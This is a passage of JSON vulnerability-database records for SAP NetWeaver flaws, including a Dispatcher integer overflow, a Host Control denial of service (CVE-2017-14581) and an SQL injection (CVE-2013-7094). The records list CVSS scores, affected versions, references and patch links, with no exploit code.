"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-05481",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2014-05481",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation of SAP\u0027s integrated technology platform and all SAP applications since SAP Business Suite. An integer overflow vulnerability exists in SAP NetWeaver Dispatcher. An attacker exploits a vulnerability to conduct a denial of service attack",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05481"
},
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-05481",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "110610",
"trust": 0.6
},
{
"db": "SECUNIA",
"id": "60488",
"trust": 0.6
},
{
"db": "IVD",
"id": "E99BCE8A-1EC0-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"id": "VAR-201409-1160",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"last_update_date": "2022-05-17T02:09:04.423000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Dispatcher Integer Overflow Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/49762"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/60488/"
},
{
"trust": 0.6,
"url": "http://osvdb.com/show/osvdb/110610"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-09T00:00:00",
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"date": "2014-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-05481"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Dispatcher Integer Overflow Vulnerability",
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05481"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer error",
"sources": [
{
"db": "IVD",
"id": "e99bce8a-1ec0-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201709-0547
Vulnerability from variot
The Host Control web service in SAP NetWeaver AS JAVA 7.0 through 7.5 allows remote attackers to cause a denial of service (service crash) via a crafted request, aka SAP Security Note 2389181. SAP NetWeaver AS JAVA Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability SAP Security Note 2389181 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0547",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.00"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 to 7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.00",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14581"
}
]
},
"cve": "CVE-2017-14581",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14581",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14581",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14581",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-799",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Host Control web service in SAP NetWeaver AS JAVA 7.0 through 7.5 allows remote attackers to cause a denial of service (service crash) via a crafted request, aka SAP Security Note 2389181. SAP NetWeaver AS JAVA Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability SAP Security Note 2389181 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14581",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008409",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"id": "VAR-201709-0547",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:08.184000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "June 2017 (2389181)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
},
{
"title": "SAP NetWeaver Application Server JAVA Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=74963"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-400",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-030-sap-hostcontrol-remote-dos/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14581"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14581"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-17-030-sap-hostcontrol-remote-dos/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"date": "2017-09-19T16:29:00.403000",
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008409"
},
{
"date": "2021-04-20T19:22:59.963000",
"db": "NVD",
"id": "CVE-2017-14581"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA Vulnerable to resource exhaustion",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-799"
}
],
"trust": 0.6
}
}
var-201312-0311
Vulnerability from variot
SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver \"RSDDCVER_COUNT_TAB_COLS\" function fails to properly filter user-submitted input, allowing remote attackers to exploit vulnerabilities to submit special SQL queries that can retrieve or manipulate database information. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SAP NetWeaver 7.30 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0311",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 3.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "BID",
"id": "64232"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7094"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin of ERPScan",
"sources": [
{
"db": "BID",
"id": "64232"
}
],
"trust": 0.3
},
"cve": "CVE-2013-7094",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-7094",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-15063",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-7094",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-15063",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-300",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver \\\"RSDDCVER_COUNT_TAB_COLS\\\" function fails to properly filter user-submitted input, allowing remote attackers to exploit vulnerabilities to submit special SQL queries that can retrieve or manipulate database information. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. \nExploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nSAP NetWeaver 7.30 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "BID",
"id": "64232"
},
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7094",
"trust": 2.9
},
{
"db": "BID",
"id": "64232",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "56061",
"trust": 1.6
},
{
"db": "CNVD",
"id": "CNVD-2013-15063",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538",
"trust": 0.8
},
{
"db": "XF",
"id": "89603",
"trust": 0.6
},
{
"db": "IVD",
"id": "9C78F5BE-1EF8-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
